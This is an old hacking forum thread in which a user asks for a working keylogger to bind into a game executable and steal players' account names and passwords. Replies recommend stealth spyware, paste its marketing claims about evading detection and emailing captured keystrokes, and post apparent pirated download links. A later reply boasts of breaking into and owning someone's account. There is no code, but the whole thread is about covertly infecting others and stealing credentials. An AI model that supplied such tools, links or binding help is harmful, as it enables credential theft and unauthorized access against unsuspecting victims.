munin
+ Reply to Thread

Thread: Looking for KeyLogger which is working

Looking for KeyLogger which is working

Hi,
    im just looking for a keylogger which is working ... im going to bind it with a game .exe file and its good when it is not detected but its not important ...the importan point is that it works caus ive got * other keylogger which doesnt work (keylogger is not sending email.. ProAgent 2.*,EKL) it would be grate if someone posts a link to download one it just have to logg everything (password and account name form games)

thxxx Darkness

If you are looking for free, you may not have much luck. Otherwise try Spytector. [url]http://www.spytector.com/[/url]

Try this one: Advanced Invisible Keylogger v.*.*
    This is what they say it does.

Advanced Invisible Keylogger is the most powerful stealth spy software offered ToolAnywhere! Advanced Invisible Keylogger runs silently at the lowest level of windows capturing every keystroke typed including usernames and windows log-on passwords. Advanced Invisible Keylogger can also capture active window text, text typed in all popular instant messengers including AOL, YAHOO, ***, MSN AND AIM. All Desktop activity will be recorded through Advanced Invisible Keylogger\'s secret! Have reports sent to your email address at anytime secretly! Advanced Invisible Keylogger is so stealth and hides so well not even a computer technician with years of experience could detect it running. The most powerful stealth program at the most affordable price! Free for us lol

Try [url]http://www.zshare.net/download/advanced-invisible-keylogger-v-*-*-[/url] -uploaded-by-sirqueza-rar.html

Or [url]http://www.wikiupload.com/download_page.php?id=*25248[/url]

It shows up as riskware on antivirus. I don't use these things but it works.
    Last edited by Tito; 04-17-2007 at 11:59 AM.

Cool

well if you don't use it...how you know it works..lol.
    =========================================================
    Bythe way DARKNESS*2*...... if you are who i think you are,well all i have to say is that the request you make me,well it's done. Not only i got in,but i have a lot of info about him and ************x.
    And....... in case it's you i must say, since you had no "faith" in my habilities,i will send you real proof that i hacked it,and i own the account.

<****xx{::Whoaaa::::::>
    jabber: gh05t*d@jabb*r.org Email: gh05t*d@hack.cl

Internet security is as real as your Dreams !

+ Reply to Thread